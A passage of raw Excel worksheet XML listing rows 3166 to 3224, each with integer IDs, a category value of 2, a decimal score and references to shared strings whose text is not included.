      </c>
      <c r="G3166" t="s">
        <v>6260</v>
      </c>
      <c r="H3166" t="s">
        <v>6261</v>
      </c>
    </row>
    <row r="3167" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3167" s="1">
        <v>3165</v>
      </c>
      <c r="B3167">
        <v>4650</v>
      </c>
      <c r="C3167">
        <v>4650</v>
      </c>
      <c r="D3167">
        <v>2</v>
      </c>
      <c r="E3167">
        <v>0.85449999570846558</v>
      </c>
      <c r="F3167" t="s">
        <v>5592</v>
      </c>
      <c r="G3167" t="s">
        <v>6262</v>
      </c>
      <c r="H3167" t="s">
        <v>6263</v>
      </c>
    </row>
    <row r="3168" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3168" s="1">
        <v>3166</v>
      </c>
      <c r="B3168">
        <v>5767</v>
      </c>
      <c r="C3168">
        <v>5767</v>
      </c>
      <c r="D3168">
        <v>2</v>
      </c>
      <c r="E3168">
        <v>0.87360000610351563</v>
      </c>
      <c r="F3168" t="s">
        <v>5592</v>
      </c>
      <c r="G3168" t="s">
        <v>6264</v>
      </c>
      <c r="H3168" t="s">
        <v>6023</v>
      </c>
    </row>
    <row r="3169" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3169" s="1">
        <v>3167</v>
      </c>
      <c r="B3169">
        <v>5764</v>
      </c>
      <c r="C3169">
        <v>5764</v>
      </c>
      <c r="D3169">
        <v>2</v>
      </c>
      <c r="E3169">
        <v>0.68389999866485596</v>
      </c>
      <c r="F3169" t="s">
        <v>5592</v>
      </c>
      <c r="G3169" t="s">
        <v>6265</v>
      </c>
      <c r="H3169" t="s">
        <v>6266</v>
      </c>
    </row>
    <row r="3170" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3170" s="1">
        <v>3168</v>
      </c>
      <c r="B3170">
        <v>6014</v>
      </c>
      <c r="C3170">
        <v>6014</v>
      </c>
      <c r="D3170">
        <v>2</v>
      </c>
      <c r="E3170">
        <v>0.86309999227523804</v>
      </c>
      <c r="F3170" t="s">
        <v>5592</v>
      </c>
      <c r="G3170" t="s">
        <v>6267</v>
      </c>
      <c r="H3170" t="s">
        <v>6268</v>
      </c>
    </row>
    <row r="3171" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3171" s="1">
        <v>3169</v>
      </c>
      <c r="B3171">
        <v>6013</v>
      </c>
      <c r="C3171">
        <v>6013</v>
      </c>
      <c r="D3171">
        <v>2</v>
      </c>
      <c r="E3171">
        <v>0.96660000085830688</v>
      </c>
      <c r="F3171" t="s">
        <v>5592</v>
      </c>
      <c r="G3171" t="s">
        <v>6269</v>
      </c>
      <c r="H3171" t="s">
        <v>6270</v>
      </c>
    </row>
    <row r="3172" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3172" s="1">
        <v>3170</v>
      </c>
      <c r="B3172">
        <v>6012</v>
      </c>
      <c r="C3172">
        <v>6012</v>
      </c>
      <c r="D3172">
        <v>2</v>
      </c>
      <c r="E3172">
        <v>0.80379998683929443</v>
      </c>
      <c r="F3172" t="s">
        <v>5592</v>
      </c>
      <c r="G3172" t="s">
        <v>6271</v>
      </c>
      <c r="H3172" t="s">
        <v>6272</v>
      </c>
    </row>
    <row r="3173" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3173" s="1">
        <v>3171</v>
      </c>
      <c r="B3173">
        <v>4491</v>
      </c>
      <c r="C3173">
        <v>4491</v>
      </c>
      <c r="D3173">
        <v>2</v>
      </c>
      <c r="E3173">
        <v>0.65719997882843018</v>
      </c>
      <c r="F3173" t="s">
        <v>5592</v>
      </c>
      <c r="G3173" t="s">
        <v>6273</v>
      </c>
      <c r="H3173" t="s">
        <v>6274</v>
      </c>
    </row>
    <row r="3174" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3174" s="1">
        <v>3172</v>
      </c>
      <c r="B3174">
        <v>5141</v>
      </c>
      <c r="C3174">
        <v>5141</v>
      </c>
      <c r="D3174">
        <v>2</v>
      </c>
      <c r="E3174">
        <v>0.68940001726150513</v>
      </c>
      <c r="F3174" t="s">
        <v>5592</v>
      </c>
      <c r="G3174" t="s">
        <v>6275</v>
      </c>
      <c r="H3174" t="s">
        <v>6276</v>
      </c>
    </row>
    <row r="3175" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3175" s="1">
        <v>3173</v>
      </c>
      <c r="B3175">
        <v>5759</v>
      </c>
      <c r="C3175">
        <v>5759</v>
      </c>
      <c r="D3175">
        <v>2</v>
      </c>
      <c r="E3175">
        <v>0.75499999523162842</v>
      </c>
      <c r="F3175" t="s">
        <v>5592</v>
      </c>
      <c r="G3175" t="s">
        <v>6277</v>
      </c>
      <c r="H3175" t="s">
        <v>6278</v>
      </c>
    </row>
    <row r="3176" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3176" s="1">
        <v>3174</v>
      </c>
      <c r="B3176">
        <v>5137</v>
      </c>
      <c r="C3176">
        <v>5137</v>
      </c>
      <c r="D3176">
        <v>2</v>
      </c>
      <c r="E3176">
        <v>0.88700002431869507</v>
      </c>
      <c r="F3176" t="s">
        <v>5592</v>
      </c>
      <c r="G3176" t="s">
        <v>6279</v>
      </c>
      <c r="H3176" t="s">
        <v>6280</v>
      </c>
    </row>
    <row r="3177" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3177" s="1">
        <v>3175</v>
      </c>
      <c r="B3177">
        <v>5126</v>
      </c>
      <c r="C3177">
        <v>5126</v>
      </c>
      <c r="D3177">
        <v>2</v>
      </c>
      <c r="E3177">
        <v>0.46939998865127558</v>
      </c>
      <c r="F3177" t="s">
        <v>5592</v>
      </c>
      <c r="G3177" t="s">
        <v>6281</v>
      </c>
      <c r="H3177" t="s">
        <v>6282</v>
      </c>
    </row>
    <row r="3178" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3178" s="1">
        <v>3176</v>
      </c>
      <c r="B3178">
        <v>6010</v>
      </c>
      <c r="C3178">
        <v>6010</v>
      </c>
      <c r="D3178">
        <v>2</v>
      </c>
      <c r="E3178">
        <v>0.58569997549057007</v>
      </c>
      <c r="F3178" t="s">
        <v>5592</v>
      </c>
      <c r="G3178" t="s">
        <v>6283</v>
      </c>
      <c r="H3178" t="s">
        <v>6284</v>
      </c>
    </row>
    <row r="3179" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3179" s="1">
        <v>3177</v>
      </c>
      <c r="B3179">
        <v>4496</v>
      </c>
      <c r="C3179">
        <v>4496</v>
      </c>
      <c r="D3179">
        <v>2</v>
      </c>
      <c r="E3179">
        <v>0.95329999923706055</v>
      </c>
      <c r="F3179" t="s">
        <v>5592</v>
      </c>
      <c r="G3179" t="s">
        <v>6285</v>
      </c>
      <c r="H3179" t="s">
        <v>6286</v>
      </c>
    </row>
    <row r="3180" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3180" s="1">
        <v>3178</v>
      </c>
      <c r="B3180">
        <v>6005</v>
      </c>
      <c r="C3180">
        <v>6005</v>
      </c>
      <c r="D3180">
        <v>2</v>
      </c>
      <c r="E3180">
        <v>0.71689999103546143</v>
      </c>
      <c r="F3180" t="s">
        <v>5592</v>
      </c>
      <c r="G3180" t="s">
        <v>6287</v>
      </c>
      <c r="H3180" t="s">
        <v>6288</v>
      </c>
    </row>
    <row r="3181" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3181" s="1">
        <v>3179</v>
      </c>
      <c r="B3181">
        <v>5761</v>
      </c>
      <c r="C3181">
        <v>5761</v>
      </c>
      <c r="D3181">
        <v>2</v>
      </c>
      <c r="E3181">
        <v>0.86110001802444458</v>
      </c>
      <c r="F3181" t="s">
        <v>5592</v>
      </c>
      <c r="G3181" t="s">
        <v>6289</v>
      </c>
      <c r="H3181" t="s">
        <v>6290</v>
      </c>
    </row>
    <row r="3182" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3182" s="1">
        <v>3180</v>
      </c>
      <c r="B3182">
        <v>5762</v>
      </c>
      <c r="C3182">
        <v>5762</v>
      </c>
      <c r="D3182">
        <v>2</v>
      </c>
      <c r="E3182">
        <v>0.76520001888275146</v>
      </c>
      <c r="F3182" t="s">
        <v>5592</v>
      </c>
      <c r="G3182" t="s">
        <v>6291</v>
      </c>
      <c r="H3182" t="s">
        <v>6292</v>
      </c>
    </row>
    <row r="3183" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3183" s="1">
        <v>3181</v>
      </c>
      <c r="B3183">
        <v>5996</v>
      </c>
      <c r="C3183">
        <v>5996</v>
      </c>
      <c r="D3183">
        <v>2</v>
      </c>
      <c r="E3183">
        <v>0.99250000715255737</v>
      </c>
      <c r="F3183" t="s">
        <v>5592</v>
      </c>
      <c r="G3183" t="s">
        <v>6293</v>
      </c>
      <c r="H3183" t="s">
        <v>6294</v>
      </c>
    </row>
    <row r="3184" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3184" s="1">
        <v>3182</v>
      </c>
      <c r="B3184">
        <v>4508</v>
      </c>
      <c r="C3184">
        <v>4508</v>
      </c>
      <c r="D3184">
        <v>2</v>
      </c>
      <c r="E3184">
        <v>0.69760000705718994</v>
      </c>
      <c r="F3184" t="s">
        <v>5592</v>
      </c>
      <c r="G3184" t="s">
        <v>6295</v>
      </c>
      <c r="H3184" t="s">
        <v>6296</v>
      </c>
    </row>
    <row r="3185" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3185" s="1">
        <v>3183</v>
      </c>
      <c r="B3185">
        <v>4509</v>
      </c>
      <c r="C3185">
        <v>4509</v>
      </c>
      <c r="D3185">
        <v>2</v>
      </c>
      <c r="E3185">
        <v>0.60030001401901245</v>
      </c>
      <c r="F3185" t="s">
        <v>5592</v>
      </c>
      <c r="G3185" t="s">
        <v>6297</v>
      </c>
      <c r="H3185" t="s">
        <v>6298</v>
      </c>
    </row>
    <row r="3186" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3186" s="1">
        <v>3184</v>
      </c>
      <c r="B3186">
        <v>5135</v>
      </c>
      <c r="C3186">
        <v>5135</v>
      </c>
      <c r="D3186">
        <v>2</v>
      </c>
      <c r="E3186">
        <v>0.72979998588562012</v>
      </c>
      <c r="F3186" t="s">
        <v>5592</v>
      </c>
      <c r="G3186" t="s">
        <v>6299</v>
      </c>
      <c r="H3186" t="s">
        <v>6300</v>
      </c>
    </row>
    <row r="3187" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3187" s="1">
        <v>3185</v>
      </c>
      <c r="B3187">
        <v>5804</v>
      </c>
      <c r="C3187">
        <v>5804</v>
      </c>
      <c r="D3187">
        <v>2</v>
      </c>
      <c r="E3187">
        <v>0.78769999742507935</v>
      </c>
      <c r="F3187" t="s">
        <v>5592</v>
      </c>
      <c r="G3187" t="s">
        <v>6301</v>
      </c>
      <c r="H3187" t="s">
        <v>6302</v>
      </c>
    </row>
    <row r="3188" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3188" s="1">
        <v>3186</v>
      </c>
      <c r="B3188">
        <v>4654</v>
      </c>
      <c r="C3188">
        <v>4654</v>
      </c>
      <c r="D3188">
        <v>2</v>
      </c>
      <c r="E3188">
        <v>0.5812000036239624</v>
      </c>
      <c r="F3188" t="s">
        <v>5592</v>
      </c>
      <c r="G3188" t="s">
        <v>6303</v>
      </c>
      <c r="H3188" t="s">
        <v>6304</v>
      </c>
    </row>
    <row r="3189" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3189" s="1">
        <v>3187</v>
      </c>
      <c r="B3189">
        <v>5934</v>
      </c>
      <c r="C3189">
        <v>5934</v>
      </c>
      <c r="D3189">
        <v>2</v>
      </c>
      <c r="E3189">
        <v>0.61049997806549072</v>
      </c>
      <c r="F3189" t="s">
        <v>5592</v>
      </c>
      <c r="G3189" t="s">
        <v>6305</v>
      </c>
      <c r="H3189" t="s">
        <v>6306</v>
      </c>
    </row>
    <row r="3190" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3190" s="1">
        <v>3188</v>
      </c>
      <c r="B3190">
        <v>4913</v>
      </c>
      <c r="C3190">
        <v>4913</v>
      </c>
      <c r="D3190">
        <v>2</v>
      </c>
      <c r="E3190">
        <v>0.74080002307891846</v>
      </c>
      <c r="F3190" t="s">
        <v>5592</v>
      </c>
      <c r="G3190" t="s">
        <v>6307</v>
      </c>
      <c r="H3190" t="s">
        <v>6308</v>
      </c>
    </row>
    <row r="3191" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3191" s="1">
        <v>3189</v>
      </c>
      <c r="B3191">
        <v>5840</v>
      </c>
      <c r="C3191">
        <v>5840</v>
      </c>
      <c r="D3191">
        <v>2</v>
      </c>
      <c r="E3191">
        <v>0.99849998950958252</v>
      </c>
      <c r="F3191" t="s">
        <v>5592</v>
      </c>
      <c r="G3191" t="s">
        <v>6309</v>
      </c>
      <c r="H3191" t="s">
        <v>6310</v>
      </c>
    </row>
    <row r="3192" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3192" s="1">
        <v>3190</v>
      </c>
      <c r="B3192">
        <v>4909</v>
      </c>
      <c r="C3192">
        <v>4909</v>
      </c>
      <c r="D3192">
        <v>2</v>
      </c>
      <c r="E3192">
        <v>0.84450000524520874</v>
      </c>
      <c r="F3192" t="s">
        <v>5592</v>
      </c>
      <c r="G3192" t="s">
        <v>6311</v>
      </c>
      <c r="H3192" t="s">
        <v>6312</v>
      </c>
    </row>
    <row r="3193" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3193" s="1">
        <v>3191</v>
      </c>
      <c r="B3193">
        <v>5841</v>
      </c>
      <c r="C3193">
        <v>5841</v>
      </c>
      <c r="D3193">
        <v>2</v>
      </c>
      <c r="E3193">
        <v>0.99900001287460327</v>
      </c>
      <c r="F3193" t="s">
        <v>5592</v>
      </c>
      <c r="G3193" t="s">
        <v>6313</v>
      </c>
      <c r="H3193" t="s">
        <v>6314</v>
      </c>
    </row>
    <row r="3194" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3194" s="1">
        <v>3192</v>
      </c>
      <c r="B3194">
        <v>4789</v>
      </c>
      <c r="C3194">
        <v>4789</v>
      </c>
      <c r="D3194">
        <v>2</v>
      </c>
      <c r="E3194">
        <v>0.58730000257492065</v>
      </c>
      <c r="F3194" t="s">
        <v>5592</v>
      </c>
      <c r="G3194" t="s">
        <v>6315</v>
      </c>
      <c r="H3194" t="s">
        <v>6316</v>
      </c>
    </row>
    <row r="3195" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3195" s="1">
        <v>3193</v>
      </c>
      <c r="B3195">
        <v>4791</v>
      </c>
      <c r="C3195">
        <v>4791</v>
      </c>
      <c r="D3195">
        <v>2</v>
      </c>
      <c r="E3195">
        <v>0.82279998064041138</v>
      </c>
      <c r="F3195" t="s">
        <v>5592</v>
      </c>
      <c r="G3195" t="s">
        <v>6317</v>
      </c>
      <c r="H3195" t="s">
        <v>6318</v>
      </c>
    </row>
    <row r="3196" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3196" s="1">
        <v>3194</v>
      </c>
      <c r="B3196">
        <v>5898</v>
      </c>
      <c r="C3196">
        <v>5898</v>
      </c>
      <c r="D3196">
        <v>2</v>
      </c>
      <c r="E3196">
        <v>0.991100013256073</v>
      </c>
      <c r="F3196" t="s">
        <v>5592</v>
      </c>
      <c r="G3196" t="s">
        <v>6319</v>
      </c>
      <c r="H3196" t="s">
        <v>6320</v>
      </c>
    </row>
    <row r="3197" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3197" s="1">
        <v>3195</v>
      </c>
      <c r="B3197">
        <v>5846</v>
      </c>
      <c r="C3197">
        <v>5846</v>
      </c>
      <c r="D3197">
        <v>2</v>
      </c>
      <c r="E3197">
        <v>0.99809998273849487</v>
      </c>
      <c r="F3197" t="s">
        <v>5592</v>
      </c>
      <c r="G3197" t="s">
        <v>6321</v>
      </c>
      <c r="H3197" t="s">
        <v>6322</v>
      </c>
    </row>
    <row r="3198" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3198" s="1">
        <v>3196</v>
      </c>
      <c r="B3198">
        <v>4902</v>
      </c>
      <c r="C3198">
        <v>4902</v>
      </c>
      <c r="D3198">
        <v>2</v>
      </c>
      <c r="E3198">
        <v>0.50150001049041748</v>
      </c>
      <c r="F3198" t="s">
        <v>5592</v>
      </c>
      <c r="G3198" t="s">
        <v>6323</v>
      </c>
      <c r="H3198" t="s">
        <v>6324</v>
      </c>
    </row>
    <row r="3199" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3199" s="1">
        <v>3197</v>
      </c>
      <c r="B3199">
        <v>5847</v>
      </c>
      <c r="C3199">
        <v>5847</v>
      </c>
      <c r="D3199">
        <v>2</v>
      </c>
      <c r="E3199">
        <v>0.63730001449584961</v>
      </c>
      <c r="F3199" t="s">
        <v>5592</v>
      </c>
      <c r="G3199" t="s">
        <v>6325</v>
      </c>
      <c r="H3199" t="s">
        <v>6326</v>
      </c>
    </row>
    <row r="3200" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3200" s="1">
        <v>3198</v>
      </c>
      <c r="B3200">
        <v>4900</v>
      </c>
      <c r="C3200">
        <v>4900</v>
      </c>
      <c r="D3200">
        <v>2</v>
      </c>
      <c r="E3200">
        <v>0.55409997701644897</v>
      </c>
      <c r="F3200" t="s">
        <v>5592</v>
      </c>
      <c r="G3200" t="s">
        <v>6327</v>
      </c>
      <c r="H3200" t="s">
        <v>6328</v>
      </c>
    </row>
    <row r="3201" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3201" s="1">
        <v>3199</v>
      </c>
      <c r="B3201">
        <v>5848</v>
      </c>
      <c r="C3201">
        <v>5848</v>
      </c>
      <c r="D3201">
        <v>2</v>
      </c>
      <c r="E3201">
        <v>0.63609999418258667</v>
      </c>
      <c r="F3201" t="s">
        <v>5592</v>
      </c>
      <c r="G3201" t="s">
        <v>6329</v>
      </c>
      <c r="H3201" t="s">
        <v>6330</v>
      </c>
    </row>
    <row r="3202" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3202" s="1">
        <v>3200</v>
      </c>
      <c r="B3202">
        <v>4795</v>
      </c>
      <c r="C3202">
        <v>4795</v>
      </c>
      <c r="D3202">
        <v>2</v>
      </c>
      <c r="E3202">
        <v>0.88429999351501465</v>
      </c>
      <c r="F3202" t="s">
        <v>5592</v>
      </c>
      <c r="G3202" t="s">
        <v>6331</v>
      </c>
      <c r="H3202" t="s">
        <v>6332</v>
      </c>
    </row>
    <row r="3203" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3203" s="1">
        <v>3201</v>
      </c>
      <c r="B3203">
        <v>4796</v>
      </c>
      <c r="C3203">
        <v>4796</v>
      </c>
      <c r="D3203">
        <v>2</v>
      </c>
      <c r="E3203">
        <v>0.93110001087188721</v>
      </c>
      <c r="F3203" t="s">
        <v>5592</v>
      </c>
      <c r="G3203" t="s">
        <v>6333</v>
      </c>
      <c r="H3203" t="s">
        <v>6334</v>
      </c>
    </row>
    <row r="3204" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3204" s="1">
        <v>3202</v>
      </c>
      <c r="B3204">
        <v>4797</v>
      </c>
      <c r="C3204">
        <v>4797</v>
      </c>
      <c r="D3204">
        <v>2</v>
      </c>
      <c r="E3204">
        <v>0.94220000505447388</v>
      </c>
      <c r="F3204" t="s">
        <v>5592</v>
      </c>
      <c r="G3204" t="s">
        <v>6335</v>
      </c>
      <c r="H3204" t="s">
        <v>6336</v>
      </c>
    </row>
    <row r="3205" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3205" s="1">
        <v>3203</v>
      </c>
      <c r="B3205">
        <v>5899</v>
      </c>
      <c r="C3205">
        <v>5899</v>
      </c>
      <c r="D3205">
        <v>2</v>
      </c>
      <c r="E3205">
        <v>0.64789998531341553</v>
      </c>
      <c r="F3205" t="s">
        <v>5592</v>
      </c>
      <c r="G3205" t="s">
        <v>6337</v>
      </c>
      <c r="H3205" t="s">
        <v>6338</v>
      </c>
    </row>
    <row r="3206" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3206" s="1">
        <v>3204</v>
      </c>
      <c r="B3206">
        <v>4784</v>
      </c>
      <c r="C3206">
        <v>4784</v>
      </c>
      <c r="D3206">
        <v>2</v>
      </c>
      <c r="E3206">
        <v>0.99620002508163452</v>
      </c>
      <c r="F3206" t="s">
        <v>5592</v>
      </c>
      <c r="G3206" t="s">
        <v>6339</v>
      </c>
      <c r="H3206" t="s">
        <v>6340</v>
      </c>
    </row>
    <row r="3207" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3207" s="1">
        <v>3205</v>
      </c>
      <c r="B3207">
        <v>5900</v>
      </c>
      <c r="C3207">
        <v>5900</v>
      </c>
      <c r="D3207">
        <v>2</v>
      </c>
      <c r="E3207">
        <v>0.99769997596740723</v>
      </c>
      <c r="F3207" t="s">
        <v>5592</v>
      </c>
      <c r="G3207" t="s">
        <v>6341</v>
      </c>
      <c r="H3207" t="s">
        <v>6342</v>
      </c>
    </row>
    <row r="3208" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3208" s="1">
        <v>3206</v>
      </c>
      <c r="B3208">
        <v>4914</v>
      </c>
      <c r="C3208">
        <v>4914</v>
      </c>
      <c r="D3208">
        <v>2</v>
      </c>
      <c r="E3208">
        <v>0.59640002250671387</v>
      </c>
      <c r="F3208" t="s">
        <v>5592</v>
      </c>
      <c r="G3208" t="s">
        <v>6343</v>
      </c>
      <c r="H3208" t="s">
        <v>6344</v>
      </c>
    </row>
    <row r="3209" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3209" s="1">
        <v>3207</v>
      </c>
      <c r="B3209">
        <v>4767</v>
      </c>
      <c r="C3209">
        <v>4767</v>
      </c>
      <c r="D3209">
        <v>2</v>
      </c>
      <c r="E3209">
        <v>0.97380000352859497</v>
      </c>
      <c r="F3209" t="s">
        <v>5592</v>
      </c>
      <c r="G3209" t="s">
        <v>6345</v>
      </c>
      <c r="H3209" t="s">
        <v>6346</v>
      </c>
    </row>
    <row r="3210" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3210" s="1">
        <v>3208</v>
      </c>
      <c r="B3210">
        <v>5902</v>
      </c>
      <c r="C3210">
        <v>5902</v>
      </c>
      <c r="D3210">
        <v>2</v>
      </c>
      <c r="E3210">
        <v>0.99860000610351563</v>
      </c>
      <c r="F3210" t="s">
        <v>5592</v>
      </c>
      <c r="G3210" t="s">
        <v>6347</v>
      </c>
      <c r="H3210" t="s">
        <v>6348</v>
      </c>
    </row>
    <row r="3211" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3211" s="1">
        <v>3209</v>
      </c>
      <c r="B3211">
        <v>5839</v>
      </c>
      <c r="C3211">
        <v>5839</v>
      </c>
      <c r="D3211">
        <v>2</v>
      </c>
      <c r="E3211">
        <v>0.99529999494552612</v>
      </c>
      <c r="F3211" t="s">
        <v>5592</v>
      </c>
      <c r="G3211" t="s">
        <v>6349</v>
      </c>
      <c r="H3211" t="s">
        <v>6350</v>
      </c>
    </row>
    <row r="3212" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3212" s="1">
        <v>3210</v>
      </c>
      <c r="B3212">
        <v>4770</v>
      </c>
      <c r="C3212">
        <v>4770</v>
      </c>
      <c r="D3212">
        <v>2</v>
      </c>
      <c r="E3212">
        <v>0.99879997968673706</v>
      </c>
      <c r="F3212" t="s">
        <v>5592</v>
      </c>
      <c r="G3212" t="s">
        <v>6351</v>
      </c>
      <c r="H3212" t="s">
        <v>6352</v>
      </c>
    </row>
    <row r="3213" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3213" s="1">
        <v>3211</v>
      </c>
      <c r="B3213">
        <v>4771</v>
      </c>
      <c r="C3213">
        <v>4771</v>
      </c>
      <c r="D3213">
        <v>2</v>
      </c>
      <c r="E3213">
        <v>0.99900001287460327</v>
      </c>
      <c r="F3213" t="s">
        <v>5592</v>
      </c>
      <c r="G3213" t="s">
        <v>6353</v>
      </c>
      <c r="H3213" t="s">
        <v>6354</v>
      </c>
    </row>
    <row r="3214" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3214" s="1">
        <v>3212</v>
      </c>
      <c r="B3214">
        <v>4918</v>
      </c>
      <c r="C3214">
        <v>4918</v>
      </c>
      <c r="D3214">
        <v>2</v>
      </c>
      <c r="E3214">
        <v>0.99260002374649048</v>
      </c>
      <c r="F3214" t="s">
        <v>5592</v>
      </c>
      <c r="G3214" t="s">
        <v>6355</v>
      </c>
      <c r="H3214" t="s">
        <v>6356</v>
      </c>
    </row>
    <row r="3215" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3215" s="1">
        <v>3213</v>
      </c>
      <c r="B3215">
        <v>4917</v>
      </c>
      <c r="C3215">
        <v>4917</v>
      </c>
      <c r="D3215">
        <v>2</v>
      </c>
      <c r="E3215">
        <v>0.96310001611709595</v>
      </c>
      <c r="F3215" t="s">
        <v>5592</v>
      </c>
      <c r="G3215" t="s">
        <v>6357</v>
      </c>
      <c r="H3215" t="s">
        <v>6358</v>
      </c>
    </row>
    <row r="3216" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3216" s="1">
        <v>3214</v>
      </c>
      <c r="B3216">
        <v>5854</v>
      </c>
      <c r="C3216">
        <v>5854</v>
      </c>
      <c r="D3216">
        <v>2</v>
      </c>
      <c r="E3216">
        <v>0.89960002899169922</v>
      </c>
      <c r="F3216" t="s">
        <v>5592</v>
      </c>
      <c r="G3216" t="s">
        <v>6359</v>
      </c>
      <c r="H3216" t="s">
        <v>6360</v>
      </c>
    </row>
    <row r="3217" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3217" s="1">
        <v>3215</v>
      </c>
      <c r="B3217">
        <v>4774</v>
      </c>
      <c r="C3217">
        <v>4774</v>
      </c>
      <c r="D3217">
        <v>2</v>
      </c>
      <c r="E3217">
        <v>0.99940001964569092</v>
      </c>
      <c r="F3217" t="s">
        <v>5592</v>
      </c>
      <c r="G3217" t="s">
        <v>6361</v>
      </c>
      <c r="H3217" t="s">
        <v>6362</v>
      </c>
    </row>
    <row r="3218" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3218" s="1">
        <v>3216</v>
      </c>
      <c r="B3218">
        <v>4776</v>
      </c>
      <c r="C3218">
        <v>4776</v>
      </c>
      <c r="D3218">
        <v>2</v>
      </c>
      <c r="E3218">
        <v>0.99430000782012939</v>
      </c>
      <c r="F3218" t="s">
        <v>5592</v>
      </c>
      <c r="G3218" t="s">
        <v>6363</v>
      </c>
      <c r="H3218" t="s">
        <v>6364</v>
      </c>
    </row>
    <row r="3219" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3219" s="1">
        <v>3217</v>
      </c>
      <c r="B3219">
        <v>4777</v>
      </c>
      <c r="C3219">
        <v>4777</v>
      </c>
      <c r="D3219">
        <v>2</v>
      </c>
      <c r="E3219">
        <v>0.99550002813339233</v>
      </c>
      <c r="F3219" t="s">
        <v>5592</v>
      </c>
      <c r="G3219" t="s">
        <v>6365</v>
      </c>
      <c r="H3219" t="s">
        <v>6366</v>
      </c>
    </row>
    <row r="3220" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3220" s="1">
        <v>3218</v>
      </c>
      <c r="B3220">
        <v>4778</v>
      </c>
      <c r="C3220">
        <v>4778</v>
      </c>
      <c r="D3220">
        <v>2</v>
      </c>
      <c r="E3220">
        <v>0.63870000839233398</v>
      </c>
      <c r="F3220" t="s">
        <v>5592</v>
      </c>
      <c r="G3220" t="s">
        <v>6367</v>
      </c>
      <c r="H3220" t="s">
        <v>6368</v>
      </c>
    </row>
    <row r="3221" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3221" s="1">
        <v>3219</v>
      </c>
      <c r="B3221">
        <v>5901</v>
      </c>
      <c r="C3221">
        <v>5901</v>
      </c>
      <c r="D3221">
        <v>2</v>
      </c>
      <c r="E3221">
        <v>0.9968000054359436</v>
      </c>
      <c r="F3221" t="s">
        <v>5592</v>
      </c>
      <c r="G3221" t="s">
        <v>6369</v>
      </c>
      <c r="H3221" t="s">
        <v>6370</v>
      </c>
    </row>
    <row r="3222" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3222" s="1">
        <v>3220</v>
      </c>
      <c r="B3222">
        <v>4780</v>
      </c>
      <c r="C3222">
        <v>4780</v>
      </c>
      <c r="D3222">
        <v>2</v>
      </c>
      <c r="E3222">
        <v>0.99750000238418579</v>
      </c>
      <c r="F3222" t="s">
        <v>5592</v>
      </c>
      <c r="G3222" t="s">
        <v>6371</v>
      </c>
      <c r="H3222" t="s">
        <v>6372</v>
      </c>
    </row>
    <row r="3223" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3223" s="1">
        <v>3221</v>
      </c>
      <c r="B3223">
        <v>4915</v>
      </c>
      <c r="C3223">
        <v>4915</v>
      </c>
      <c r="D3223">
        <v>2</v>
      </c>
      <c r="E3223">
        <v>0.99639999866485596</v>
      </c>
      <c r="F3223" t="s">
        <v>5592</v>
      </c>
      <c r="G3223" t="s">
        <v>6373</v>
      </c>
      <c r="H3223" t="s">
        <v>6374</v>
      </c>
    </row>
    <row r="3224" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3224" s="1">
        <v>3222</v>
      </c>
      <c r="B3224">
        <v>4781</v>
      </c>
      <c r="C3224">
        <v>4781</v>
      </c>
      <c r="D3224">
        <v>2</v>
      </c>
      <c r="E3224">
        <v>0.72500002384185791</v>
      </c>
      <c r="F3224" t="s">
        <v>5592</v>
      </c>
      <c r="G3224" t="s">
        <v>6375</v>
      </c>
      <c r="H3224" t="s">
        <v>6376</v>
      </c>
    </row>
